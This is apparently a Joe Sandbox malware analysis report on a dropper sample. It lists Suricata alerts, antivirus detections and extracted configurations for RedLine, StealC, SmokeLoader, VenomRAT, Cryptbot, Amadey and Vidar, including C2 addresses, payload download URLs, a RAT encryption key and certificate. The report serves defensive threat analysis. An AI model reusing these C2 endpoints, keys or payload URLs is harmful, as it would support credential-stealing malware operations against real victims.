Severity:	1
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:23.669554+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:29.190276+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:57.401107+0200
SID:	2039103
Severity:	1
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.17 - Destination IP: 192.168.2.7

Timestamp:	2024-08-26T23:29:20.156947+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:28.496746+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:19.763962+0200
SID:	2044244
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:27.079311+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:25.351820+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:25.855148+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:20.731975+0200
SID:	2044248
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:19.149929+0200
SID:	2044696
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:25.681938+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:22.116770+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:09.218666+0200
SID:	2803305
Severity:	3
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:55.175302+0200
SID:	2039103
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 154.216.18.223

Timestamp:	2024-08-26T23:29:14.903053+0200
SID:	2803305
Severity:	3
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:25.620843+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:45.190048+0200
SID:	2044696
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:46.274562+0200
SID:	2039103
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 95.179.163.21

Timestamp:	2024-08-26T23:29:23.275989+0200
SID:	2043231
Severity:	1
Source Port:	49728
Destination Port:	29257
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:52.973908+0200
SID:	2039103
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:52.973908+0200
SID:	2851815
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:23.329566+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:22.861650+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:24.007747+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:25.479739+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:50.622687+0200
SID:	2039103
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:50.622687+0200
SID:	2851815
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 65.21.18.51

Timestamp:	2024-08-26T23:29:27.745873+0200
SID:	2043231
Severity:	1
Source Port:	49729
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 185.215.113.16

Timestamp:	2024-08-26T23:29:11.531615+0200
SID:	2803305
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.7 - Destination IP: 185.215.113.17

Timestamp:	2024-08-26T23:29:20.142345+0200
SID:	2044246
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.7 - Destination IP: 46.100.50.5

Timestamp:	2024-08-26T23:29:49.558693+0200
SID:	2039103
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PQ2AUndsdb.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/inc/BitcoinCore.exe;	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/Set-up.exea	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/BitcoinCore.exe?	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/BitcoinCore.exe2	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpData	Avira URL Cloud: Label: malware
Source: http://yosoborno.com/mp/6HP	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpic_qt	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/Set-up.exe=	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/BitcoinCore.exe	Avira URL Cloud: Label: phishing
Source: http://yosoborno.com/bH	Avira URL Cloud: Label: malware
Source: http://yosoborno.com/tmp/	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.php6	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.php&	Avira URL Cloud: Label: malware
Source: http://yosoborno.com/tmp/ds	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/XClient_protected.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.php.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpS	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpV	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll9	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe

Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000013.00000002.1885204503.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php"}
Source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://yosoborno.com/tmp/", "http://wshcnsd.xyz/tmp/", "http://nusdhj.ws/tmp/"]}
Source: 38.0.XClient_protected.exe.df0000.0.unpack	Malware Configuration Extractor: VenomRAT {"Server": "62.113.117.95", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "nsBwpZM9eXyJwjFOEPqQT7eVgQEXAQHF", "Mutex": "hwelcvbupaqfzors", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "gHC5vkN9zBopm5sBbLuVVSEzvzYOUKFV8bvwuRt+l6zqoaDt4+6q8X89hkYZwRRcV4aSBKWG1W0vjQwl0JkuLKf9aLLnXR/AYXJhp2MJwHgpiyEAz1Nd29z7lL/5+DGBmeGzzFtFDN2FiRyRIFZxaXr/QOXK3uCwMuCxCpIIoqQ=", "BDOS": "null"}
Source: 38.0.XClient_protected.exe.df0000.0.unpack	Malware Configuration Extractor: AsyncRAT {"Server": "62.113.117.95", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "nsBwpZM9eXyJwjFOEPqQT7eVgQEXAQHF", "Mutex": "hwelcvbupaqfzors", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "gHC5vkN9zBopm5sBbLuVVSEzvzYOUKFV8bvwuRt+l6zqoaDt4+6q8X89hkYZwRRcV4aSBKWG1W0vjQwl0JkuLKf9aLLnXR/AYXJhp2MJwHgpiyEAz1Nd29z7lL/5+DGBmeGzzFtFDN2FiRyRIFZxaXr/QOXK3uCwMuCxCpIIoqQ=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: Set-up.exe.5108.34.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["vs.top", "@fivexx5vs.top", "xx5vs.top", "`vfivexx5vs.top", "fivexx5vs.top", "s.top", "analforeverlovyu.top"]}
Source: axplong.exe.7944.17.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}
Source: stealc_default2[1].exe.17.dr	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\BitcoinCore[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Set-up[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\runtime[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\whicctb	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: PQ2AUndsdb.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PQ2AUndsdb.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09368E50 CryptUnprotectData,		20_2_09368E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_09369410 CryptUnprotectData,		20_2_09369410

Source: PQ2AUndsdb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 0000001F.00000002.2196839633.0000000069AED000.00000002.00000001.01000000.0000001B.sdmp, mozglue[1].dll.31.dr, mozglue.dll.31.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.31.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.31.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, nss3[1].dll.31.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.31.dr
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 0000001F.00000002.2197149619.0000000069F3F000.00000002.00000001.01000000.0000001A.sdmp, nss3[1].dll.31.dr
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 0000001F.00000002.2196839633.0000000069AED000.00000002.00000001.01000000.0000001B.sdmp, mozglue[1].dll.31.dr, mozglue.dll.31.dr
Source:	Binary string: G.pdb source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 25_2_0041B6DA FindFirstFileExW,

25_2_0041B6DA

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	28_2_07981728
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 4x nop then jmp 07982109h	28_2_07981E58
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 4x nop then jmp 07980D0Dh	28_2_07980CEC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49724 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49723 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.7:49723
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49725 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49729 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49729 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49728 -> 95.179.163.21:29257
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49728 -> 95.179.163.21:29257
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.7:49729
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.163.21:29257 -> 192.168.2.7:49728
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49734 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49733 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49733 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.7:49733
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49733 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.7:49733
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49733 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49730 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.163.21:29257 -> 192.168.2.7:49728
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.7:49729
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49739 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49741 -> 195.133.48.136:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49743 -> 185.215.113.16:80
